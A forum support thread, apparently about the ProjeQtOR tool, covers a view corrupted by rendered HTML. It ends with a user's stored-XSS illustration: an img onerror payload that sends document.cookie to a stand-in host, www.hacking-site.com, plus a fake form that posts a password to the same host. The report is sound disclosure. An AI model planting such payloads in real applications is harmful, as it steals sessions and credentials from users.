[SOLVED] View corrupted

Hi,

My view is sometime corrupted because :
- either the server answer html below, and projeqtor tries to display it in js (function checkAlertRetour(data) )
- either projetqtor display html tags stored in project follow up which corrupts the view (same html below can be used)

After some brief tests,
- link tag is not supported - it corrupts the view

not support html tags
<link rel="stylesheet" type="text/css" href="maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" media="all"/>


Server answer :

For line below, I change character / into M

<html lang="en-us" prefix="content: http:MMpurl.orgMrssM1.0MmodulesMcontentM dc: http:MMpurl.orgMdcMtermsM foaf: http:MMxmlns.comMfoafM0.1M og: http:MMogp.meMns# rdfs: http:MMwww.w3.orgM2000M01Mrdf-schema# sioc: http:MMrdfs.orgMsiocMns# sioct: http:MMrdfs.orgMsiocMtypes# skos: http:MMwww.w3.orgM2004M02MskosMcore# xsd: http:MMwww.w3.orgM2001MXMLSchema#">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type="text/css">
@charset "UTF-8";
[ng\:cloak],
[ng-cloak],
[data-ng-cloak],
[x-ng-cloak],
.ng-cloak,
.x-ng-cloak,
.ng-hide:not(.ng-hide-animate) {
display: none !important;
}

ng\:form {
display: block;
}

.ng-animate-shim {
visibility: hidden;
}

.ng-anchor {
position: absolute;
}
</style>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Oops, something lost</title>
<meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap.">
<link media="all" rel="stylesheet" href="style.css">
<link rel="stylesheet" href="maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<link href="fonts.googleapis.com/css?family=Open+San...0i,700,700i,800,800i" rel="stylesheet">

<script>
(function(i,s,o,g,r,a,m){i=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-26575989-46', 'auto');
ga('send', 'pageview');

</script>
</head>

<body>

<div class="error" id="error">
<div class="container">
<div class="content centered"><img style="width:500px;" src="something-lost.png">
<h1>Oops, looks like the page is lost.</h1>
<p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p>
</div>
</div>

Hi,

i change the code

function checkAlertRetour(data) {
if (data) {
data=data.replace(/http/gi, "bbbb");

Hi,

for my issue, changing the code solves my issue (Too difficult to change my web hoster)

this problem intrigued me and I read some hacking problem related to the fact what happens if when basic users are allowed to change the behavior of html page.

the basic example i just learned XSS / Cross-Site Scripting

<img src="azerty.jpg" onerror="window.location='www.hacking-site.com/recuperation_cookie...ie='+document.cookie;" hidden>

you put upper text in project Activity Stream and then
- no one can access to project/task ... the page jumps to www.hacking-site.com
- the cookies and forwarded to the page

variation of the issue, more subtil, ask a user to enter his password

<form action="http://www.hacking-site/action_page.php">
please enter your name:<br>
<input type="text" name="please enter your name" value="Mickey"><br>
and your password:<br>
<input type="text" name="and your password" value="Mouse"><br><br>
<input type="submit" value="Submit">
</form>


hope it helps you